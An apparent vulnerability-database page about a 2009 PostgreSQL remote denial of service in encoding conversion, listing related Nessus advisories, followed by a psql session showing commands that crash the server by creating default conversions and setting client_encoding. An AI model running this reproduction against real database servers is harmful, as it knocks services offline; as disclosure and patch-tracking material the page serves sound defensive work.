| Reporter | Title | Published | Views | Family All 89 |
|---|---|---|---|---|
| PostgreSQL Error Message Conversion Remote DoS | 12 Mar 200900:00 | – | nessus | |
| CentOS 4 / 5 : postgresql (CESA-2009:1484) | 6 Jan 201000:00 | – | nessus | |
| Fedora 9 : postgresql-8.3.7-1.fc9 (2009-2927) | 24 Mar 200900:00 | – | nessus | |
| Fedora 10 : postgresql-8.3.7-1.fc10 (2009-2959) | 23 Apr 200900:00 | – | nessus | |
| GLSA-201110-22 : PostgreSQL: Multiple vulnerabilities | 25 Oct 201100:00 | – | nessus | |
| Mandriva Linux Security Advisory : postgresql (MDVSA-2009:079) | 23 Apr 200900:00 | – | nessus | |
| MiracleLinux 3 : postgresql-8.1.18-2.1.1AXS3 (AXSA:2009-415:01) | 14 Jan 202600:00 | – | nessus | |
| Oracle Linux 5 : postgresql (ELSA-2009-1484) | 12 Jul 201300:00 | – | nessus | |
| RHEL 4 / 5 : postgresql (RHSA-2009:1484) | 8 Oct 200900:00 | – | nessus | |
| Scientific Linux Security Update : postgresql on SL3.x, SL4.x, SL5.x i386/x86_64 | 1 Aug 201200:00 | – | nessus |
=cut=
postgres(at)sunset:~$ createdb test -E KOI8
postgres(at)sunset:~$ psql test
Welcome to psql 8.3.6, the PostgreSQL interactive terminal.
Type: \\copyright for distribution terms
\\h for help with SQL commands
\\? for help with psql commands
\\g or terminate with semicolon to execute query
\\q to quit
test=# SHOW server_version;
server_version
----------------
8.3.6
(1 row)
test=# CREATE DEFAULT CONVERSION test1 FOR \'LATIN1\' TO \'KOI8\' FROM
ascii_to_mic;
CREATE CONVERSION
test=# CREATE DEFAULT CONVERSION test2 FOR \'KOI8\' TO \'LATIN1\' FROM
mic_to_ascii;
CREATE CONVERSION
test=# set client_encoding to \'LATIN1\';
server closed the connection unexpectedly
This probably means the server terminated abnormally
before or while processing the request.
Соединение с сервером было потеряно.
Попытка переустановить: Безуспешно.
!> \\q
=end cut=
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation